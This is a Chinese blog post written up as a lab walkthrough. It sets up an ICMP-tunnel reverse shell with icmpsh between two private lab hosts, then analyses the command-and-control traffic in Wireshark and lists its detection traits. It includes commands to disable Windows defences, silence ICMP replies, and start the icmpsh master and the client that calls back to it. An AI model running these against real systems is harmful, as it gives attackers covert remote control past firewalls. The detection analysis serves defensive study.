【渗透测试】ICMP隧道技术之icmpsh使用(含流量分析)

最新推荐文章于 2024-01-24 17:49:10 发布
最新推荐文章于 2024-01-24 17:49:10 发布
阅读量2.8k 收藏 7
点赞数 1
分类专栏: 内网 渗透测试 文章标签: 网络安全 wireshark 网络协议 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/120553598
版权

目录

一、环境

Win10:10.95.16.112
CentOS7:10.95.16.103

二、工具

icmpsh
python2

三、操作

win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除
centOS7安装python2对应的库文件用于支持icmpsh工具

pip2 install impacket

在这里插入图片描述

1、CentOS7
sysctl -w net.ipv4.icmp_echo_ignore_all=1 【关闭本机的icmp响应】

python2 icmpsh_m.py 10.95.16.103 10.95.16.112

在这里插入图片描述

2、Win10
icmpsh.exe -t 10.95.16.103

在这里插入图片描述

3、反弹成功

在这里插入图片描述
【这里执行了whoamiipconfig两个命令便于观察下面流量信息】

四、C2流量分析
1、正常的icmp流量

数据包长度不大
数据包长度不大,有交互
数据包内容
在这里插入图片描述
在这里插入图片描述

2、恶意的icmp流量

数据包长度明显过长
在这里插入图片描述
且数据包没有data字段

在这里插入图片描述
在这里插入图片描述

3、C2数据

第一个包攻击机下达命令
在这里插入图片描述
第二个包回显命令执行结果
在这里插入图片描述
如果一来一回reply-request没有把命令回显结束,则会分包回显命令执行结果
执行了ipconfig命令
在这里插入图片描述
回显,一个包没有回显结束
在这里插入图片描述
第三个包空(reply包)
在这里插入图片描述
第四个包继续回显
在这里插入图片描述

总结

在当前的实验环境下,icmp流量抓取的相对容易,而且流量是明文传输,特征十分的明显。总结以下几点:
1、数据包长度过长
2、数包没有data字段
3、reply包携带明文的命令语句(同时没有info内容)
4、request包明文回显执行结果(info内容为 no response found
5、一个数据包回显不完C2结果会以多个包的形式回显(期间reply数据包没有data字段且info为空)

by 久违
2021.9.29

久违 °
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ICMP隧道分析与实现
墨痕诉清风的博客
05-20 749
ICMP数据包封装过程 ICMP头部分为三个字段 type 类型 (0回应,8请求) code 代码 checksum 校验和 所以在封装ICMP报文的时候也要按顺序去封装这几个字段 其余部分三个部分为为 标识符 ( identifier ),一般填写进程 PID 以区分其他 ping 进程; 报文序号 ( sequence number ),用于编号报文序列; 数据 ( data ),可以是任意数据; ICMP协议在实际传输中数据包:
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
10-05
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
ICMP隧道检测分析--icmptunnel
shutdown -s -t
09-29 1340
简介 icmptunnel的工作原理是将你的IP流量封装在ICMP echo数据包中,并将其发送到你自己的代理服务器。代理服务器解压缩数据包并转发IP流量。传入的以客户为目的地的IP数据包再次被封装在ICMP回复数据包中,并发回给客户。IP流量是在ICMP数据包的 "data "字段中发送的。 icmptunnel通过创建一个虚拟的隧道接口来工作。客户端主机上的所有用户流量被路由到icmptunnel在这个接口上监听IP数据包。这些数据包被封装在一个ICMP echo数据包中(即ICMP数据包的payloa
ICMP隐蔽隧道攻击分析与检测
2301_76725413的博客
07-28 609
进行隐蔽隧道传输的时候,被控端(防火墙内部)运行并接受外部攻击端的ICMP_ECHO数据包,攻击端把需要执行的命令隐藏在ICMP_ECHO数据包中,被控端接收到该数据包,解出其中隐藏的命令,并在防火墙内部主机上执行,再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端。样本利用ICMP协议同C2进行通信,ICMP协议中的data字段可写入任意自定义数据,样本会将上线数据填充1024个字节放在ICMP协议的data字段,并且返回的ICMP数据包的data字段也是固定的1024个字节。
威胁狩猎-ICMP流量分析
m0_61101264的博客
10-18 363
ICMP隧道通常用于绕过防火墙或者其他网络限制,将数据封装在ICMP消息的Data字段中,可以将数据包看作是ICMP消息,因此可以在允许ICMP协议通信的网络中传输信息。ICMP后门通常是一种隐蔽的攻击技术,因为ICMP流量通常被认为是合法的网络流量,很少受到严格的防火墙或入侵检测系统的监视和过滤。不同的Type和Code值表示不同的ICMP报文类型,对应了数据包处理过程中可能出现的不同错误情况,不同类型的ICMP报文又分为差错报文和查询报文两种,如下表所示。其内容取决于ICMP消息的类型和代码。
icmp 流量抓取 转发 代理(2)
weixin_30628801的博客
09-17 290
客户端C到服务器S的icmp包经过本机P时被截获,在上一篇中已经介绍了如何获取原始目的地址,你必须将数据转发到原始目的地址S,并且在收到从原始目的地址的响应之后转发给客户端。此时,要实现透明代理,则你返回给客户端的icmp响应的源地址必须为客户端请求的原始目的地址S。由于使用的是raw socket,无法用IP_TRANSPARENT的socket选项绑定非本机地址的方法(bind会报错...
ICMP隐蔽隧道工具--icmptunnel流量特征检测分析
最新发布
qq_36259703的博客
01-24 909
icmptunnel的工作原理是将你的内容封装在ICMP echo数据包中,一般在ICMP数据包的 "data "字段中发送,并将其发送到你自己的。代理服务器解压缩数据包并转发。传入的以客户为目的地的IP数据包再次被封装在ICMP回复数据包中,并发回给客户。
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。...但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
Wireshark协议分析之ICMP协议及其应用数据包.zip
03-12
本资料包“Wireshark协议分析之ICMP协议及其应用数据包.zip”聚焦于ICMP(Internet Control Message Protocol)协议,以及其在ping和tracert(traceroute)命令中的应用。通过提供的两个 pcapng 文件——icmp_...
网络流量监视软件-查看网络状态如TCP/IP状态,UDP和ICMP状态等信息
02-14
是一个专用的软件流量监视软件,可以显示总发送接收速率,同时也估计当前的传输速度,不管是针对ADSL或者MODEN的用户都非常有用,并且软件界面可以更换字体,软件可以详细查看网络状态如TCP/IP状态,UDP和ICMP状态等信息,同时软件支持透明窗体.
流量分析工具 科来网络分析64.zip
05-28
总结来说,科来网络分析系统64位版本是一款功能强大、易于使用的网络流量分析工具,它提供了全面的网络监控、问题诊断和安全防护能力,是企业和个人进行网络管理的必备工具。通过熟练掌握其使用方法,我们可以更有效...
易语言监控ICMP流量
08-21
3. **数据包捕获**:实现流量监控,需要使用数据包捕获技术,如在Windows系统下可以使用WinPCap或Npcap库,它们允许程序在数据链路层直接访问网络接口,获取原始网络封包。 4. **易语言编程**:熟悉易语言的语法和...
icmp 流量抓取 转发 代理
weixin_30455023的博客
09-10 504
通过以下步骤,将经过本机的(设置本机为网关)icmp流量抓取,并获取其目标地址,可以用来做icmp代理。 1. iptables 在 mangle 表的 prerouting链中添加规则,给icmp包做标记,比如0x15 iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark 0x15 ...
dns隧道攻击原理及常用工具流量分析
Fiverya的博客
02-20 3234
今天看到一个关于Lyceum组织的文章,这个组织擅长使用dns隧道攻击,这种攻击方式还是头一次听说,于是搜集了一些文章来看看。
ICMP隧道
javaEE_zero的博客
11-23 240
ICMP隧道的实现原理和防御方式
ICMP流量转发
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
02-22 1059
ICMP流量转发 工具:pingtunnel(以打包上传) https://wws.lanzous.com/b01nsubkj 本地转发 将主机C上的7777端口的流量转发至主机B上的80端口,以达到在主机C上访问127.0.0.1:7777时,会访问到主机B上的80端口 主机B作为客户端 ./pingtunnel -type [client/server] -l [:7777 转发源端口] -s [转发目的IP] -t [指定转发至目标server] -tcp [1 指定tcp流量转.
指定icmp数据包长度_基于统计分析的ICMP隧道检测方法与实现
weixin_39622225的博客
12-03 559
一、概述在企业内网环境中,ICMP协议是必不可少的网络通信协议之一,被用于检测网络连通状态,通常情况下,防火墙会默认放此协议。由于防火墙对ICMP协议开放,恶意攻击者常会利用ICMP协议进行非法通信。例如,在黑客攻击中经常出现一种情况是,黑客通过某一种方式取得了一台主机的权限,得到了一些文件,比如域hash,密码文件之类的东西,需要回传至本地进行破解,但是防火墙阻断了由内网发起的请求,只有icmp...
网络安全】常见的网路安全设备及功能作用总结
热门推荐
SunnyCat
10-20 1万+
常见的网路安全设备及功能作用总结一、 WAF 应用防火墙二、IDS 入侵检测系统:三、IPS 入侵防御系统(入侵检测+入侵防御)四、SOC 安全运营中心五、SIEM 信息安全和事件管理六、Vulnerability Scanner漏洞扫描器七、UTM 统一威胁管理八、DDOS防护九、FireWall 防火墙十、VPN 虚拟专用网络十一、 上网行为管理十二、 云安全技术/主机安全十三、 DBAudit 数据库审计 WAF:Web应用防火墙 —应用层的攻击防护 IDS:入侵检测系统 — IPS:入
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值